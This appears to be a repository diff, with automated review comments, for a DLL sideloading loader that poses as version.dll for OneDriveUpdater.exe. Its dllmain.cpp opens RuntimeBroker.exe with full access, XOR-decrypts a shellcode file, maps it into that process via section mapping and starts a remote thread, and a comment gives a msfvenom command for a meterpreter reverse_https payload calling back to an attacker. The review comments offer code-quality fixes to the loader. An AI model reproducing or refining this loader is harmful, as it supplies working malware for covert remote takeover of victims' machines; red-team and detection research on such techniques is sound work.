    CreateSection.h
     1 +#pragma once
     2 + 
     3 + //All credits to https://github.com/peperunas/injectopi/tree/master/CreateSection
     4 + //@file CreateSection.h
     5 + //@author Giulio De Pasquale, hasherezade
     6 + //@brief Section Hijacking
     7 +#pragma once
     8 + 
     9 +#include <Windows.h>
     10 +#include <stdio.h>
     11 + 
     12 +#if !defined NTSTATUS
     13 +typedef LONG NTSTATUS;
     14 +#endif
     15 + 
     16 +#define STATUS_SUCCESS 0
     17 + 
     18 +#if !defined PROCESSINFOCLASS
     19 +typedef LONG PROCESSINFOCLASS;
     20 +#endif
     21 + 
     22 +#if !defined PPEB
     23 +typedef struct _PEB* PPEB;
     24 +#endif
     25 + 
     26 +#if !defined PROCESS_BASIC_INFORMATION
     27 +typedef struct _PROCESS_BASIC_INFORMATION {
     28 + PVOID Reserved1;
     29 + PPEB PebBaseAddress;
     30 + PVOID Reserved2[2];
     31 + ULONG_PTR UniqueProcessId;
     32 + PVOID Reserved3;
     33 +} PROCESS_BASIC_INFORMATION;
     34 +#endif;
     35 + 
     36 +typedef LONG NTSTATUS, * PNTSTATUS;
     37 +typedef struct _UNICODE_STRING {
     38 + USHORT Length;
     39 + USHORT MaximumLength;
     40 + PWSTR Buffer;
     41 +} UNICODE_STRING, * PUNICODE_STRING;
     42 + 
     43 +typedef struct _OBJECT_ATTRIBUTES {
     44 + ULONG Length;
     45 + HANDLE RootDirectory;
     46 + PUNICODE_STRING ObjectName;
     47 + ULONG Attributes;
     48 + PVOID SecurityDescriptor;
     49 + PVOID SecurityQualityOfService;
     50 +} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
     51 + 
     52 +#define NT_SUCCESS(Status) ((NTSTATUS)(Status) == STATUS_SUCCESS)
     53 + 
     54 +typedef OBJECT_ATTRIBUTES* POBJECT_ATTRIBUTES;
     55 +#define InitializeObjectAttributes( p, n, a, r, s ) { \
     56 + (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \
     57 + (p)->RootDirectory = r; \
     58 + (p)->Attributes = a; \
     59 + (p)->ObjectName = n; \
     60 + (p)->SecurityDescriptor = s; \
     61 + (p)->SecurityQualityOfService = NULL; \
     62 + }
     63 + 
     64 +typedef NTSTATUS(WINAPI* PFN_ZWQUERYINFORMATIONPROCESS)(HANDLE,
     65 + PROCESSINFOCLASS, PVOID,
     66 + ULONG, PULONG);
     67 + 
     68 +NTSTATUS(NTAPI* ZwQueryInformationProcess)
     69 +(HANDLE ProcessHandle, PROCESSINFOCLASS ProcessInformationClass,
     70 + PVOID ProcessInformation, ULONG ProcessInformationLength, PULONG ReturnLength);
     71 + 
     72 +NTSTATUS(NTAPI* ZwCreateSection)
     73 +(_Out_ PHANDLE SectionHandle, _In_ ACCESS_MASK DesiredAccess,
     74 + _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
     75 + _In_opt_ PLARGE_INTEGER MaximumSize, _In_ ULONG SectionPageProtection,
     76 + _In_ ULONG AllocationAttributes, _In_opt_ HANDLE FileHandle);
     77 + 
     78 +NTSTATUS(NTAPI* NtMapViewOfSection)
     79 +(_In_ HANDLE SectionHandle, _In_ HANDLE ProcessHandle,
     80 + _Inout_ PVOID* BaseAddress, _In_ ULONG_PTR ZeroBits, _In_ SIZE_T CommitSize,
     81 + _Inout_opt_ PLARGE_INTEGER SectionOffset, _Inout_ PSIZE_T ViewSize,
     82 + _In_ DWORD InheritDisposition, _In_ ULONG AllocationType,
     83 + _In_ ULONG Win32Protect);
     84 + 
     85 +NTSTATUS(NTAPI* ZwCreateThreadEx)
     86 +(_Out_ PHANDLE ThreadHandle, _In_ ACCESS_MASK DesiredAccess,
     87 + _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, _In_ HANDLE ProcessHandle,
     88 + _In_ PVOID StartRoutine, _In_opt_ PVOID Argument, _In_ ULONG CreateFlags,
     89 + _In_opt_ ULONG_PTR ZeroBits, _In_opt_ SIZE_T StackSize,
     90 + _In_opt_ SIZE_T MaximumStackSize, _In_opt_ PVOID AttributeList);
     91 + 
     92 + 
     93 +NTSTATUS(NTAPI* ZwUnmapViewOfSection)
     94 +(_In_ HANDLE ProcessHandle, _In_opt_ PVOID BaseAddress);
     95 + 
     96 + 
     97 +NTSTATUS(NTAPI* ZwClose)(_In_ HANDLE Handle);
     98 + 
     99 +typedef struct _CLIENT_ID
     100 +{
     101 + PVOID UniqueProcess;
     102 + PVOID UniqueThread;
     103 +} CLIENT_ID, * PCLIENT_ID;
     104 + 
     105 +NTSTATUS(NTAPI* ZwOpenProcess)
     106 +(
     107 + PHANDLE ProcessHandle,
     108 + ACCESS_MASK DesiredAccess,
     109 + POBJECT_ATTRIBUTES ObjectAttributes,
     110 + PCLIENT_ID ClientID
     111 + );
     112 + 
     113 +NTSTATUS(NTAPI* NtDelayExecution)(
     114 + BOOL Alertable,
     115 + PLARGE_INTEGER DelayInterval
     116 + );
     117 + 
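Review bot: `NTSTATUS` is typedef'd twice in this header — once at line 13 behind `#if !defined NTSTATUS`, which tests for a macro that never exists (NTSTATUS is a typedef, so the guard always passes), and again unconditionally at line 36 — and `POBJECT_ATTRIBUTES` likewise at lines 50 and 54; C++ tolerates identical redeclarations, but one copy of each should go. Smaller hygiene points: `#pragma once` appears at both line 1 and line 7, and `#endif;` at line 34 carries a stray semicolon. The function-pointer globals from line 68 on (`ZwQueryInformationProcess`, `ZwCreateSection`, …) are definitions rather than `extern` declarations, so including this header from a second translation unit would likely produce duplicate-symbol link errors. `ZwQueryInformationProcess` and `ZwUnmapViewOfSection` are also never resolved by `LoadNtdllFunctions` in dllmain.cpp, so they stay null and could simply be dropped.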
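--- a/README.md
+++ b/README.md
@@ -0,0 +1,19 @@
+# OneDriveUpdater DLL Sideloading
+This repo contains source code for DLL sideloading the `version.dll` for OneDriveUpdater.exe/OneDriveStandaloneUpdater.exe.
+The payload is based on the subroutines outlined in the PaloAltoNetworks Unit42's [blog post](https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/).
+
+My blog post regarding this payload:
+
+## version
+Modified source code from the proxy DLL created by [SharpDLLProxy](https://github.com/Flangvik/SharpDllProxy) from [Flangvik](https://twitter.com/Flangvik).
+
+## versionConsole
+A console version of the above used for debugging purposes. Already contains a messagebox shellcode.
+
+## Credits
+- [PaloAltoNetworks Unit42](https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/)
+- [Peperunas](https://twitter.com/peperunas)'s [injectopi](https://github.com/peperunas/injectopi/tree/master/CreateSection)
+- [Sektor7's RTO Malware Essential Course](https://institute.sektor7.net/red-team-operator-malware-development-essentials)
+- [mgeeky](https://twitter.com/mariuszbit)'s [PackMyPayload](https://github.com/mgeeky/PackMyPayload)
+- [Flangvik](https://twitter.com/Flangvik)'s [SharpDllProxy](https://github.com/Flangvik/SharpDllProxy)
+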
    dllmain.cpp
     1 + 
     2 +#include "pch.h"
     3 +#include <Windows.h>
     4 +#include <TlHelp32.h>
     5 +#include <stdlib.h>
     6 +#include "CreateSection.h"
     7 +#pragma comment(lib, "ntdll")
     8 + 
     9 +#define _CRT_SECURE_NO_DEPRECATE
     10 +#pragma warning (disable : 4996)
     11 + 
     12 +#pragma comment(linker, "/export:GetFileVersionInfoA=vresion.GetFileVersionInfoA,@1")
     13 +#pragma comment(linker, "/export:GetFileVersionInfoByHandle=vresion.GetFileVersionInfoByHandle,@2")
     14 +#pragma comment(linker, "/export:GetFileVersionInfoExA=vresion.GetFileVersionInfoExA,@3")
     15 +#pragma comment(linker, "/export:GetFileVersionInfoExW=vresion.GetFileVersionInfoExW,@4")
     16 +#pragma comment(linker, "/export:GetFileVersionInfoSizeA=vresion.GetFileVersionInfoSizeA,@5")
     17 +#pragma comment(linker, "/export:GetFileVersionInfoSizeExA=vresion.GetFileVersionInfoSizeExA,@6")
     18 +#pragma comment(linker, "/export:GetFileVersionInfoSizeExW=vresion.GetFileVersionInfoSizeExW,@7")
     19 +#pragma comment(linker, "/export:GetFileVersionInfoSizeW=vresion.GetFileVersionInfoSizeW,@8")
     20 +#pragma comment(linker, "/export:GetFileVersionInfoW=vresion.GetFileVersionInfoW,@9")
     21 +#pragma comment(linker, "/export:VerFindFileA=vresion.VerFindFileA,@10")
     22 +#pragma comment(linker, "/export:VerFindFileW=vresion.VerFindFileW,@11")
     23 +#pragma comment(linker, "/export:VerInstallFileA=vresion.VerInstallFileA,@12")
     24 +#pragma comment(linker, "/export:VerInstallFileW=vresion.VerInstallFileW,@13")
     25 +#pragma comment(linker, "/export:VerLanguageNameA=vresion.VerLanguageNameA,@14")
     26 +#pragma comment(linker, "/export:VerLanguageNameW=vresion.VerLanguageNameW,@15")
     27 +#pragma comment(linker, "/export:VerQueryValueA=vresion.VerQueryValueA,@16")
     28 +#pragma comment(linker, "/export:VerQueryValueW=vresion.VerQueryValueW,@17")
     29 + 
     30 +// All credits to https://github.com/peperunas/injectopi/blob/master/CreateSection/CreateSection.cpp
     31 +// and https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/#Modification-of-Versiondll
     32 + 
     33 +BOOL LoadNtdllFunctions() {
     34 + HMODULE ntdll = GetModuleHandleA("ntdll.dll");
     35 + 
     36 + ZwOpenProcess = (NTSTATUS(NTAPI*)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, PCLIENT_ID))GetProcAddress(ntdll, "ZwOpenProcess");
     37 + if (ZwOpenProcess == NULL) return FALSE;
     38 + 
     39 + ZwCreateSection = (NTSTATUS(NTAPI*)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, PLARGE_INTEGER, ULONG, ULONG, HANDLE))
     40 + GetProcAddress(ntdll, "ZwCreateSection");
     41 + if (ZwCreateSection == NULL) return FALSE;
     42 + 
     43 + NtMapViewOfSection = (NTSTATUS(NTAPI*)(HANDLE, HANDLE, PVOID*, ULONG_PTR, SIZE_T, PLARGE_INTEGER, PSIZE_T, DWORD, ULONG, ULONG))
     44 + GetProcAddress(ntdll, "NtMapViewOfSection");
     45 + if (NtMapViewOfSection == NULL) return FALSE;
     46 + 
     47 + ZwCreateThreadEx = (NTSTATUS(NTAPI*)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, HANDLE, PVOID, PVOID, ULONG, ULONG_PTR, SIZE_T, SIZE_T, PVOID))
     48 + GetProcAddress(ntdll, "ZwCreateThreadEx");
     49 + if (ZwCreateThreadEx == NULL) return FALSE;
     50 + 
     51 + NtDelayExecution = (NTSTATUS(NTAPI*)(BOOL, PLARGE_INTEGER))GetProcAddress(ntdll, "NtDelayExecution");
     52 + if (NtDelayExecution == NULL) return FALSE;
     53 + 
     54 + 
     55 + ZwClose = (NTSTATUS(NTAPI*)(HANDLE))GetProcAddress(ntdll, "ZwClose");
     56 + if (ZwClose == NULL) return FALSE;
     57 + 
     58 + return TRUE;
     59 +}
     60 + 
     61 +HANDLE getProcHandlebyName(const char* procName) {
     62 + PROCESSENTRY32 entry;
     63 + entry.dwSize = sizeof(PROCESSENTRY32);
     64 + NTSTATUS status = NULL;
     65 + HANDLE hProc = 0;
     66 + 
     67 + HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
     68 + if (Process32First(snapshot, &entry)) {
     69 + do {
     70 + if (strcmp((entry.szExeFile), procName) == 0) {
     71 + OBJECT_ATTRIBUTES oa;
     72 + CLIENT_ID cid = { (HANDLE)entry.th32ProcessID, NULL };
     73 + InitializeObjectAttributes(&oa, nullptr, 0, nullptr, nullptr);
     74 + // 3. Call the Windows API ntdll ZwOpenProcess using the process ID from step 1. The process is opened with full control access.
     75 + status = ZwOpenProcess(&hProc, PROCESS_ALL_ACCESS, &oa, &cid);
     76 + 
     77 + if (!NT_SUCCESS(status)) {
     78 + continue;
     79 + }
     80 + return hProc;
     81 + }
     82 + } while (Process32Next(snapshot, &entry));
     83 + }
     84 + ZwClose(snapshot);
     85 + 
     86 + return NULL;
     87 +}
     88 + 
     89 +// credit: Sektor7 RTO Malware Essential Course
     90 +void XOR(char* data, size_t data_len, char* key, size_t key_len) {
     91 + int j;
     92 + 
     93 + j = 0;
     94 + for (int i = 0; i < data_len; i++) {
     95 + if (j == key_len - 1) j = 0;
     96 + 
     97 + data[i] = data[i] ^ key[j];
     98 + j++;
     99 + }
     100 +}
     101 + 
     102 + 
     103 +DWORD WINAPI DoMagic(LPVOID lpParameter)
     104 +{
     105 + if (LoadNtdllFunctions() == FALSE) {
     106 + printf("[-] Failed to load NTDLL function\n");
     107 + return -1;
     108 + }
     109 + 
     110 + // 1. Enumerate all process and locate process for RuntimeBroker.exe
     111 + // https://stackoverflow.com/questions/865152/how-can-i-get-a-process-handle-by-its-name-in-c
     112 + HANDLE hProc = getProcHandlebyName("RuntimeBroker.exe");
     113 + if (hProc == NULL) {
     114 + exit(0);
     115 + }
     116 + 
     117 + // 2. Read the payload file OneDrive.Update from the current working directory.
     118 + // msfvenom -p windows/x64/meterpreter/reverse_https lhost=<ip> lport=<port> f raw -o /root/attack/OneDrive.Update exitfunc=thread --encrypt xor --encrypt-key "jikoewarfkmzsdlhfnuiwaejrpaw" exitfunc=thread
     119 + FILE* fp;
     120 + size_t shellcodeSize;
     121 + unsigned char* shellcode;
     122 + fp = fopen("OneDrive.Update", "rb");
     123 + fseek(fp, 0, SEEK_END);
     124 + shellcodeSize = ftell(fp);
     125 + fseek(fp, 0, SEEK_SET);
     126 + shellcode = (unsigned char*)malloc(shellcodeSize);
     127 + fread(shellcode, shellcodeSize, 1, fp);
     128 + 
     129 + char key[] = "jikoewarfkmzsdlhfnuiwaejrpaw";
     130 + 
     131 + // 4. Decrypt the payload file using the XOR encryption algorithm with a 28-byte key of: jikoewarfkmzsdlhfnuiwaejrpaw
     132 + XOR((char*)shellcode, shellcodeSize, key, sizeof(key));
     133 + 
     134 + HANDLE hSection = NULL;
     135 + NTSTATUS status = NULL;
     136 + SIZE_T size = 4096;
     137 + LARGE_INTEGER sectionSize = { size };
     138 + PVOID pLocalView = NULL, pRemoteView = NULL;
     139 + SIZE_T scLength = sizeof(shellcode);
     140 + int viewUnMap = 2;
     141 + 
     142 + // 5. Call the Windows API NtCreateSection, which creates a block of memory that can be shared between processes.
     143 + if ((status = ZwCreateSection(&hSection, SECTION_ALL_ACCESS, NULL, (PLARGE_INTEGER)&sectionSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL)) != STATUS_SUCCESS) {
     144 + return -1;
     145 + }
     146 + 
     147 + // 6. Two calls into the Windows API NtMapViewOfSection. The first call maps the contents of the decrypted payload into the current process memory space.
     148 + if ((status = NtMapViewOfSection(hSection, GetCurrentProcess(),
     149 + &pLocalView, NULL, NULL, NULL,
     150 + &size, viewUnMap, NULL, PAGE_READWRITE)) != STATUS_SUCCESS) {
     151 + return -1;
     152 + }
     153 + 
     154 + // Use for in-file shellcode
     155 + //memcpy(pLocalView, shellcode, sizeof(shellcode));
     156 + 
     157 + // Use for on-disk shellcode
     158 + memcpy(pLocalView, shellcode, shellcodeSize);
     159 + 
     160 + // 6. Second call maps the contents into the Runtimebroker.exe memory space.
     161 + if ((status = NtMapViewOfSection(hSection, hProc, &pRemoteView, NULL, NULL, NULL,
     162 + &size, viewUnMap, NULL, PAGE_EXECUTE_READWRITE)) != STATUS_SUCCESS) {
     163 + return -1;
     164 + }
     165 + 
     166 + // 7. Calls the Windows API NtDelayExecution and sleeps (pauses execution) for ~4.27 seconds
     167 + LARGE_INTEGER interval;
     168 + interval.QuadPart = -1 * (int)(4270 * 10000.0f);
     169 + if ((status = NtDelayExecution(TRUE, &interval)) != STATUS_SUCCESS) {
     170 + printf("[-] Cannot delay execution. Error code: %08X\n", status);
     171 + return -1;
     172 + }
     173 +
     174 + // 8. Call the Windows API NtCreateThreadEx.
     175 + HANDLE hThread = NULL;
     176 + if ((status = ZwCreateThreadEx(&hThread, 0x1FFFFF, NULL, hProc, pRemoteView, NULL, CREATE_SUSPENDED, 0, 0, 0, 0)) != STATUS_SUCCESS) {
     177 + return -1;
     178 + }
     179 +
     180 + ResumeThread(hThread);
     181 + 
     182 + // 9. Calls the Windows API NtDelayExecution and sleeps (pauses execution) for ~4.27 seconds
     183 + interval.QuadPart = -1 * (int)(4270 * 10000.0f);
     184 + if ((status = NtDelayExecution(TRUE, &interval)) != STATUS_SUCCESS) {
     185 + printf("[-] Cannot delay execution. Error code: %08X\n", status);
     186 + return -1;
     187 + }
     188 +
     189 + // 10. Finished.
     190 + return 0;
     191 +}
     192 + 
     193 +BOOL APIENTRY DllMain(HMODULE hModule,
     194 + DWORD ul_reason_for_call,
     195 + LPVOID lpReserved
     196 +)
     197 +{
     198 + HANDLE threadHandle;
     199 + 
     200 + switch (ul_reason_for_call)
     201 + {
     202 + case DLL_PROCESS_ATTACH:
     203 + // https://gist.github.com/securitytube/c956348435cc90b8e1f7
     204 + // Create a thread and close the handle as we do not want to use it to wait for it
     205 + threadHandle = CreateThread(NULL, 0, DoMagic, NULL, 0, NULL);
     206 + CloseHandle(threadHandle);
     207 + 
     208 + case DLL_THREAD_ATTACH:
     209 + break;
     210 + case DLL_THREAD_DETACH:
     211 + break;
     212 + case DLL_PROCESS_DETACH:
     213 + Sleep(5000);
     214 + break;
     215 + }
     216 + return TRUE;
     217 +}
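Review bot: `case DLL_PROCESS_ATTACH:` at line 202 has no `break` after `CloseHandle(threadHandle);`, so control falls through into `case DLL_THREAD_ATTACH:`; it changes nothing today because that case only breaks, but the intent should be explicit — add `break;` after line 206 (or a `/* fallthrough */` marker if it is deliberate). `#define _CRT_SECURE_NO_DEPRECATE` at line 9 comes after `<stdlib.h>` and the other CRT headers have already been included, so it has no effect; the `#pragma warning (disable : 4996)` on the next line is what actually suppresses the warnings. `SIZE_T scLength = sizeof(shellcode);` at line 139 is never read, and because `shellcode` is a pointer the expression yields the pointer size rather than the buffer length, so the line should be deleted rather than left as a misleading leftover. The step comments label two different calls as `// 6.` (lines 147 and 160) while the numbering is otherwise sequential.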
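--- a/framework.h
+++ b/framework.h
@@ -0,0 +1,6 @@
+#pragma once
+
+#define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
+// Windows Header Files
+#include <windows.h>
+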
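--- a/pch.cpp
+++ b/pch.cpp
@@ -0,0 +1,6 @@
+// pch.cpp: source file corresponding to the pre-compiled header
+
+#include "pch.h"
+
+// When you are using pre-compiled headers, this source file is necessary for compilation to succeed.
+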
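--- a/pch.h
+++ b/pch.h
@@ -0,0 +1,14 @@
+// pch.h: This is a precompiled header file.
+// Files listed below are compiled only once, improving build performance for future builds.
+// This also affects IntelliSense performance, including code completion and many code browsing features.
+// However, files listed here are ALL re-compiled if any one of them is updated between builds.
+// Do not add files here that you will be updating frequently as this negates the performance advantage.
+
+#ifndef PCH_H
+#define PCH_H
+
+// add headers that you want to pre-compile here
+#include "framework.h"
+
+#endif //PCH_H
+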
    version.sln
     1 +
     2 +Microsoft Visual Studio Solution File, Format Version 12.00
     3 +# Visual Studio Version 16
     4 +VisualStudioVersion = 16.0.32228.343
     5 +MinimumVisualStudioVersion = 10.0.40219.1
     6 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "version", "version.vcxproj", "{51E6D98F-C249-4BC6-82A7-838F05F9ABE9}"
     7 +EndProject
     8 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "versionConsole", "versionConsole\versionConsole.vcxproj", "{19D8DD80-682E-4F0B-BBEE-A04FB5CFD0D1}"
     9 +EndProject
     10 +Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Solution Items", "Solution Items", "{8C60B5B4-88E9-458E-98F2-47409AEF96A5}"
     11 + ProjectSection(SolutionItems) = preProject
     12 + README.md = README.md
     13 + EndProjectSection
     14 +EndProject
     15 +Global
     16 + GlobalSection(SolutionConfigurationPlatforms) = preSolution
     17 + Debug|x64 = Debug|x64
     18 + Debug|x86 = Debug|x86
     19 + Release|x64 = Release|x64
     20 + Release|x86 = Release|x86
     21 + EndGlobalSection
     22 + GlobalSection(ProjectConfigurationPlatforms) = postSolution
     23 + {51E6D98F-C249-4BC6-82A7-838F05F9ABE9}.Debug|x64.ActiveCfg = Debug|x64
     24 + {51E6D98F-C249-4BC6-82A7-838F05F9ABE9}.Debug|x64.Build.0 = Debug|x64
     25 + {51E6D98F-C249-4BC6-82A7-838F05F9ABE9}.Debug|x86.ActiveCfg = Debug|Win32
     26 + {51E6D98F-C249-4BC6-82A7-838F05F9ABE9}.Debug|x86.Build.0 = Debug|Win32
     27 + {51E6D98F-C249-4BC6-82A7-838F05F9ABE9}.Release|x64.ActiveCfg = Release|x64
     28 + {51E6D98F-C249-4BC6-82A7-838F05F9ABE9}.Release|x64.Build.0 = Release|x64
     29 + {51E6D98F-C249-4BC6-82A7-838F05F9ABE9}.Release|x86.ActiveCfg = Release|Win32
     30 + {51E6D98F-C249-4BC6-82A7-838F05F9ABE9}.Release|x86.Build.0 = Release|Win32
     31 + {19D8DD80-682E-4F0B-BBEE-A04FB5CFD0D1}.Debug|x64.ActiveCfg = Debug|x64
     32 + {19D8DD80-682E-4F0B-BBEE-A04FB5CFD0D1}.Debug|x64.Build.0 = Debug|x64
     33 + {19D8DD80-682E-4F0B-BBEE-A04FB5CFD0D1}.Debug|x86.ActiveCfg = Debug|Win32
     34 + {19D8DD80-682E-4F0B-BBEE-A04FB5CFD0D1}.Debug|x86.Build.0 = Debug|Win32
     35 + {19D8DD80-682E-4F0B-BBEE-A04FB5CFD0D1}.Release|x64.ActiveCfg = Release|x64
     36 + {19D8DD80-682E-4F0B-BBEE-A04FB5CFD0D1}.Release|x64.Build.0 = Release|x64
     37 + {19D8DD80-682E-4F0B-BBEE-A04FB5CFD0D1}.Release|x86.ActiveCfg = Release|Win32
     38 + {19D8DD80-682E-4F0B-BBEE-A04FB5CFD0D1}.Release|x86.Build.0 = Release|Win32
     39 + EndGlobalSection
     40 + GlobalSection(SolutionProperties) = preSolution
     41 + HideSolutionNode = FALSE
     42 + EndGlobalSection
     43 + GlobalSection(ExtensibilityGlobals) = postSolution
     44 + SolutionGuid = {9E6BDCD3-E7D2-414E-B7BF-BC8FE058661C}
     45 + EndGlobalSection
     46 +EndGlobal
     47 + 
    version.vcxproj
     1 +<?xml version="1.0" encoding="utf-8"?>
     2 +<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
     3 + <ItemGroup Label="ProjectConfigurations">
     4 + <ProjectConfiguration Include="Debug|Win32">
     5 + <Configuration>Debug</Configuration>
     6 + <Platform>Win32</Platform>
     7 + </ProjectConfiguration>
     8 + <ProjectConfiguration Include="Release|Win32">
     9 + <Configuration>Release</Configuration>
     10 + <Platform>Win32</Platform>
     11 + </ProjectConfiguration>
     12 + <ProjectConfiguration Include="Debug|x64">
     13 + <Configuration>Debug</Configuration>
     14 + <Platform>x64</Platform>
     15 + </ProjectConfiguration>
     16 + <ProjectConfiguration Include="Release|x64">
     17 + <Configuration>Release</Configuration>
     18 + <Platform>x64</Platform>
     19 + </ProjectConfiguration>
     20 + </ItemGroup>
     21 + <PropertyGroup Label="Globals">
     22 + <VCProjectVersion>16.0</VCProjectVersion>
     23 + <Keyword>Win32Proj</Keyword>
     24 + <ProjectGuid>{51e6d98f-c249-4bc6-82a7-838f05f9abe9}</ProjectGuid>
     25 + <RootNamespace>version</RootNamespace>
     26 + <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
     27 + </PropertyGroup>
     28 + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
     29 + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
     30 + <ConfigurationType>DynamicLibrary</ConfigurationType>
     31 + <UseDebugLibraries>true</UseDebugLibraries>
     32 + <PlatformToolset>v142</PlatformToolset>
     33 + <CharacterSet>Unicode</CharacterSet>
     34 + </PropertyGroup>
     35 + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
     36 + <ConfigurationType>DynamicLibrary</ConfigurationType>
     37 + <UseDebugLibraries>false</UseDebugLibraries>
     38 + <PlatformToolset>v142</PlatformToolset>
     39 + <WholeProgramOptimization>true</WholeProgramOptimization>
     40 + <CharacterSet>Unicode</CharacterSet>
     41 + </PropertyGroup>
     42 + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
     43 + <ConfigurationType>DynamicLibrary</ConfigurationType>
     44 + <UseDebugLibraries>true</UseDebugLibraries>
     45 + <PlatformToolset>v142</PlatformToolset>
     46 + <CharacterSet>Unicode</CharacterSet>
     47 + </PropertyGroup>
     48 + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
     49 + <ConfigurationType>DynamicLibrary</ConfigurationType>
     50 + <UseDebugLibraries>false</UseDebugLibraries>
     51 + <PlatformToolset>v142</PlatformToolset>
     52 + <WholeProgramOptimization>true</WholeProgramOptimization>
     53 + <CharacterSet>MultiByte</CharacterSet>
     54 + </PropertyGroup>
     55 + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
     56 + <ImportGroup Label="ExtensionSettings">
     57 + </ImportGroup>
     58 + <ImportGroup Label="Shared">
     59 + </ImportGroup>
     60 + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
     61 + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
     62 + </ImportGroup>
     63 + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
     64 + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
     65 + </ImportGroup>
     66 + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
     67 + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
     68 + </ImportGroup>
     69 + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
     70 + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
     71 + </ImportGroup>
     72 + <PropertyGroup Label="UserMacros" />
     73 + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
     74 + <LinkIncremental>true</LinkIncremental>
     75 + </PropertyGroup>
     76 + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
     77 + <LinkIncremental>false</LinkIncremental>
     78 + </PropertyGroup>
     79 + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
     80 + <LinkIncremental>true</LinkIncremental>
     81 + </PropertyGroup>
     82 + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
     83 + <LinkIncremental>false</LinkIncremental>
     84 + </PropertyGroup>
     85 + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
     86 + <ClCompile>
     87 + <WarningLevel>Level3</WarningLevel>
     88 + <SDLCheck>true</SDLCheck>
     89 + <PreprocessorDefinitions>WIN32;_DEBUG;VERSION_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
     90 + <ConformanceMode>true</ConformanceMode>
     91 + <PrecompiledHeader>Use</PrecompiledHeader>
     92 + <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
     93 + </ClCompile>
     94 + <Link>
     95 + <SubSystem>Windows</SubSystem>
     96 + <GenerateDebugInformation>true</GenerateDebugInformation>
     97 + <EnableUAC>false</EnableUAC>
     98 + </Link>
     99 + </ItemDefinitionGroup>
     100 + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
     101 + <ClCompile>
     102 + <WarningLevel>Level3</WarningLevel>
     103 + <FunctionLevelLinking>true</FunctionLevelLinking>
     104 + <IntrinsicFunctions>true</IntrinsicFunctions>
     105 + <SDLCheck>true</SDLCheck>
     106 + <PreprocessorDefinitions>WIN32;NDEBUG;VERSION_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
     107 + <ConformanceMode>true</ConformanceMode>
     108 + <PrecompiledHeader>Use</PrecompiledHeader>
     109 + <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
     110 + </ClCompile>
     111 + <Link>
     112 + <SubSystem>Windows</SubSystem>
     113 + <EnableCOMDATFolding>true</EnableCOMDATFolding>
     114 + <OptimizeReferences>true</OptimizeReferences>
     115 + <GenerateDebugInformation>true</GenerateDebugInformation>
     116 + <EnableUAC>false</EnableUAC>
     117 + </Link>
     118 + </ItemDefinitionGroup>
     119 + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
     120 + <ClCompile>
     121 + <WarningLevel>Level3</WarningLevel>
     122 + <SDLCheck>true</SDLCheck>
     123 + <PreprocessorDefinitions>_DEBUG;VERSION_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
     124 + <ConformanceMode>true</ConformanceMode>
     125 + <PrecompiledHeader>Use</PrecompiledHeader>
     126 + <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
     127 + </ClCompile>
     128 + <Link>
     129 + <SubSystem>Windows</SubSystem>
     130 + <GenerateDebugInformation>true</GenerateDebugInformation>
